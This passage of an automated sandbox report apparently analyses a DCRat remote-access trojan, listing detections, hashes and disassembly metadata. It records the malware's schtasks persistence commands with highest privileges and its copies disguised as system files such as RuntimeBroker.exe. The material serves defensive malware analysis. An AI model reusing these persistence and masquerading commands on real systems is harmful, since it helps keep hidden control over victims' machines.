                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002C84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002CEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 79%, ReversingLabs
                              Has exited:false

                              General

                              Target ID:20
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:21
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Imagebase:0xb50000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.1764095997.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              General

                              Target ID:22
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:23
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Users\Public\Libraries\RuntimeBroker.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Users\Public\Libraries\RuntimeBroker.exe
                              Imagebase:0x8e0000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1758842332.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 79%, ReversingLabs
                              Has exited:true

                              General

                              Target ID:24
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 11 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:25
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Users\Public\Libraries\RuntimeBroker.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Users\Public\Libraries\RuntimeBroker.exe
                              Imagebase:0xf00000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.1764234703.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              General

                              Target ID:26
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:27
                              Start time:04:11:54
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 11 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:28
                              Start time:04:11:54
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 13 /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:29
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:30
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 12 /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:31
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:32
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:33
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 13 /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:34
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 6 /tr "'C:\Windows\Media\WinStore.App.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:35
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\Media\WinStore.App.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:36
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 10 /tr "'C:\Windows\Media\WinStore.App.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:37
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat"
                              Imagebase:0x7ff710a30000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:38
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:39
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\w32tm.exe
                              Wow64 process (32bit):false
                              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Imagebase:0x7ff6e9430000
                              File size:108'032 bytes
                              MD5 hash:81A82132737224D324A3E8DA993E2FB5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:40
                              Start time:04:11:56
                              Start date:31/08/2024
                              Path:C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe"
                              Imagebase:0x4f0000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.1774346243.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, Author: ditekSHen
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 79%, ReversingLabs
                              Has exited:true

                              General

                              Target ID:41
                              Start time:04:11:57
                              Start date:31/08/2024
                              Path:C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe"
                              Imagebase:0xaa0000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.1774197474.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:15%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:3
                                Total number of Limit Nodes:0
                                execution_graph 5976 7ffd9b8aa735 5979 7ffd9b8aa74f QueryFullProcessImageNameA 5976->5979 5978 7ffd9b8aa9f5 5979->5978

                                Executed Functions

                                Function 00007FFD9B8B21F2 Relevance: .7, Instructions: 666COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 140 7ffd9b8b21f2-7ffd9b8b21ff 141 7ffd9b8b220a-7ffd9b8b2309 140->141 142 7ffd9b8b2201-7ffd9b8b2209 140->142 146 7ffd9b8b23a7-7ffd9b8b23bb 141->146 147 7ffd9b8b230f-7ffd9b8b232b 141->147 142->141 148 7ffd9b8b23c1-7ffd9b8b2409 146->148 147->146 150 7ffd9b8b232d-7ffd9b8b2342 147->150 152 7ffd9b8b24a7-7ffd9b8b24bb 148->152 153 7ffd9b8b240f-7ffd9b8b242b 148->153 156 7ffd9b8b237b-7ffd9b8b23a5 150->156 157 7ffd9b8b2344-7ffd9b8b2356 150->157 155 7ffd9b8b24c1-7ffd9b8b2516 152->155 153->152 159 7ffd9b8b242d-7ffd9b8b2442 153->159 164 7ffd9b8b25ab-7ffd9b8b25b9 155->164 165 7ffd9b8b251c-7ffd9b8b2535 155->165 156->148 160 7ffd9b8b2358 157->160 161 7ffd9b8b235a-7ffd9b8b236d 157->161 168 7ffd9b8b247b-7ffd9b8b24a5 159->168 169 7ffd9b8b2444-7ffd9b8b2456 159->169 160->161 161->161 163 7ffd9b8b236f-7ffd9b8b2377 161->163 163->156 167 7ffd9b8b25bf-7ffd9b8b2613 164->167 165->164 174 7ffd9b8b2537-7ffd9b8b2549 165->174 176 7ffd9b8b26a8-7ffd9b8b26b6 167->176 177 7ffd9b8b2619-7ffd9b8b2632 167->177 168->155 171 7ffd9b8b2458 169->171 172 7ffd9b8b245a-7ffd9b8b246d 169->172 171->172 172->172 175 7ffd9b8b246f-7ffd9b8b2477 172->175 180 7ffd9b8b254b-7ffd9b8b255d 174->180 181 7ffd9b8b2582-7ffd9b8b25a9 174->181 175->168 179 7ffd9b8b26bc-7ffd9b8b2814 176->179 177->176 186 7ffd9b8b2634-7ffd9b8b2646 177->186 198 7ffd9b8b281c-7ffd9b8b282e 179->198 183 7ffd9b8b255f 180->183 184 7ffd9b8b2561-7ffd9b8b2574 180->184 181->167 183->184 184->184 187 7ffd9b8b2576-7ffd9b8b257e 184->187 190 7ffd9b8b2648-7ffd9b8b265a 186->190 191 7ffd9b8b267f-7ffd9b8b26a6 186->191 187->181 193 7ffd9b8b265c 190->193 194 7ffd9b8b265e-7ffd9b8b2671 190->194 191->179 193->194 194->194 195 7ffd9b8b2673-7ffd9b8b267b 194->195 195->191 199 7ffd9b8b2836-7ffd9b8b2922 call 7ffd9b8b293e 198->199 200 7ffd9b8b2830 198->200 210 7ffd9b8b2929-7ffd9b8b293d 199->210 211 7ffd9b8b2924 199->211 200->199 211->210
                                Memory Dump Source
                                • Source File: 00000000.00000002.1674691713.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b8a0000_dmhu7oz5yP.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4a95f545e1bc21e77736daf551353447192d96f5dfafe2837c141bfad85dd8d2
                                • Instruction ID: c31e21bb62582ce294dc44216812f730c563ef3392446c31b38c648865419ab0
                                • Opcode Fuzzy Hash: 4a95f545e1bc21e77736daf551353447192d96f5dfafe2837c141bfad85dd8d2
                                • Instruction Fuzzy Hash: 76323F70A19A8D8FDBB8EF68C865BE937E1FF59311F10412AD84DC72A1DB749640CB81
                                Function 00007FFD9B8A0F88 Relevance: .6, Instructions: 613COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 212 7ffd9b8a0f88-7ffd9b8a516c 214 7ffd9b8a51b6-7ffd9b8a51bd 212->214 215 7ffd9b8a516e-7ffd9b8a5196 212->215 218 7ffd9b8a51ce-7ffd9b8a51e5 214->218 219 7ffd9b8a51bf-7ffd9b8a51c9 214->219 216 7ffd9b8a5198 215->216 217 7ffd9b8a519d-7ffd9b8a51b3 215->217 216->217 217->214 223 7ffd9b8a51e7-7ffd9b8a5232 218->223 224 7ffd9b8a5234-7ffd9b8a5236 218->224 220 7ffd9b8a591f-7ffd9b8a592d 219->220 225 7ffd9b8a5239-7ffd9b8a5246 223->225 224->225 227 7ffd9b8a524c-7ffd9b8a52a8 call 7ffd9b8a4db0 225->227 228 7ffd9b8a543e-7ffd9b8a5455 225->228 238 7ffd9b8a52aa-7ffd9b8a52b4 227->238 239 7ffd9b8a52b9-7ffd9b8a5314 227->239 233 7ffd9b8a5457-7ffd9b8a54a2 228->233 234 7ffd9b8a54a4-7ffd9b8a54a6 228->234 236 7ffd9b8a54a9-7ffd9b8a54b6 233->236 234->236 240 7ffd9b8a54bc-7ffd9b8a552b call 7ffd9b8a4db0 236->240 241 7ffd9b8a55d4-7ffd9b8a55eb 236->241 238->220 257 7ffd9b8a53ee-7ffd9b8a5424 239->257 263 7ffd9b8a5584-7ffd9b8a55ba 240->263 247 7ffd9b8a563a-7ffd9b8a563c 241->247 248 7ffd9b8a55ed-7ffd9b8a5638 241->248 251 7ffd9b8a563f-7ffd9b8a564c 247->251 248->251 255 7ffd9b8a56e6-7ffd9b8a570b 251->255 256 7ffd9b8a5652-7ffd9b8a56e1 251->256 268 7ffd9b8a5735 255->268 269 7ffd9b8a570d-7ffd9b8a5733 255->269 256->220 264 7ffd9b8a542a-7ffd9b8a5439 257->264 265 7ffd9b8a5319-7ffd9b8a53eb call 7ffd9b8a0f88 257->265 271 7ffd9b8a552d-7ffd9b8a5581 call 7ffd9b8a0f88 263->271 272 7ffd9b8a55c0-7ffd9b8a55cf 263->272 264->220 265->257 275 7ffd9b8a573c-7ffd9b8a5749 268->275 269->275 271->263 272->220 277 7ffd9b8a5857-7ffd9b8a5881 275->277 278 7ffd9b8a574f-7ffd9b8a577c 275->278 286 7ffd9b8a58b5-7ffd9b8a58df 277->286 287 7ffd9b8a5883-7ffd9b8a58b3 277->287 288 7ffd9b8a5808-7ffd9b8a580e 278->288 289 7ffd9b8a5782-7ffd9b8a57ea 278->289 296 7ffd9b8a58e1-7ffd9b8a5911 286->296 297 7ffd9b8a5913-7ffd9b8a591d 286->297 287->220 294 7ffd9b8a5816-7ffd9b8a5852 288->294 304 7ffd9b8a57fc-7ffd9b8a5803 289->304 305 7ffd9b8a57ec-7ffd9b8a57f6 289->305 294->220 296->220 297->220 304->220 305->304
                                Memory Dump Source
                                • Source File: 00000000.00000002.1674691713.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b8a0000_dmhu7oz5yP.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c50d3ee8c0a820dfb09d9e7bfb17bf9f3bd996b66c81da4b2cabe717998e48f
                                • Instruction ID: 44182ced8b75344f0490f87abbe152a3092ad8e4c7429b6058e6866343ba5461
                                • Opcode Fuzzy Hash: 1c50d3ee8c0a820dfb09d9e7bfb17bf9f3bd996b66c81da4b2cabe717998e48f
                                • Instruction Fuzzy Hash: 4342D670E1962D8FDBA8DF68C8A0BEDB7B1FF58301F5041A9D04DA7295DA346A81CF50
                                Function 00007FFD9B8AA735 Relevance: 1.8, APIs: 1, Instructions: 327COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1674691713.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b8a0000_dmhu7oz5yP.jbxd
                                Similarity
                                • API ID: FullImageNameProcessQuery
                                • String ID:
                                • API String ID: 3578328331-0
                                • Opcode ID: 26b9119e16b42740e5b911012f4e2ea18bbf5fd446d72ee8effba528ca788a1f
                                • Instruction ID: e80fdad7fafa34d7e0ff696d08f46fc9e97bb05f6d3611fbaa4b247dbca00e03
                                • Opcode Fuzzy Hash: 26b9119e16b42740e5b911012f4e2ea18bbf5fd446d72ee8effba528ca788a1f
                                • Instruction Fuzzy Hash: 0BB15D30618A8D8FEB78DF58C855BE837E1FB59301F10412ED84ECB691DB74AA81CB91

                                Non-executed Functions

                                Function 00007FFD9B8B0D9A Relevance: .7, Instructions: 701COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1674691713.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b8a0000_dmhu7oz5yP.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 144ae31fb1c87f6e6da8a95771764cb27e516cb66c76042418d5faedc721fe5d
                                • Instruction ID: 33936ab22b8a17ed44ee2c77b837c91ac2a96ad609f7d023a3458f259dd710ed
                                • Opcode Fuzzy Hash: 144ae31fb1c87f6e6da8a95771764cb27e516cb66c76042418d5faedc721fe5d
                                • Instruction Fuzzy Hash: E2322F70A19A8D8FDBB8EF28C855BE937E1FF59301F10416AD84ECB6A1DB745640CB41
                                Function 00007FFD9B8B061D Relevance: .6, Instructions: 616COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1674691713.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b8a0000_dmhu7oz5yP.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7aa74113b3639238d143b812417116c79308d6ffaadfb6f610fdfe22e4b0ef9b
                                • Instruction ID: 4a5c4db6839267d208fbddde0f5e8ac840f423eb34e134ed68db95d5f1170d95
                                • Opcode Fuzzy Hash: 7aa74113b3639238d143b812417116c79308d6ffaadfb6f610fdfe22e4b0ef9b
                                • Instruction Fuzzy Hash: FF224C70A19A8D8FEBB8EF28C855BE977E1FF59301F00416AD84EC7291DB746640CB81

                                Executed Functions

                                Function 00007FFD9B885141 Relevance: 9.4, Strings: 7, Instructions: 624COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b885000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: "$"$-$[$]${$}
                                • API String ID: 0-2220975799
                                • Opcode ID: de1b4f3352ea8af34a017d3a55dbd1f59ecd11850bf77d1d1c2e4b5a51e46d7f
                                • Instruction ID: 39b4eeb4fe6d0f4fb141611063591c8857a949112da6354079e6b21c75a08e8e
                                • Opcode Fuzzy Hash: de1b4f3352ea8af34a017d3a55dbd1f59ecd11850bf77d1d1c2e4b5a51e46d7f
                                • Instruction Fuzzy Hash: 2C42F670E1962D8FDBA8DF68C8A0BE9B7B1FF58301F5041A9D05DA7295DA385A81CF40
                                Function 00007FFD9B8806E0 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b880000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: =O_^$?O_I$O_^X$O_^f$O_^g
                                • API String ID: 0-2229697781
                                • Opcode ID: 98adc3b7d56214c0711597b08b6ac0c4939750261bba115f3ada0ca16897eba8
                                • Instruction ID: ddb7d240bb09fe26fd8588fc4e6ec2302608aeea30c212fa514380a801ac2314
                                • Opcode Fuzzy Hash: 98adc3b7d56214c0711597b08b6ac0c4939750261bba115f3ada0ca16897eba8
                                • Instruction Fuzzy Hash: CB618B63B0FA895FEB21679C7C651E83BA0FF85721B0505F7E06C8B1A7EC3469468381
                                Function 00007FFD9B8804F8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
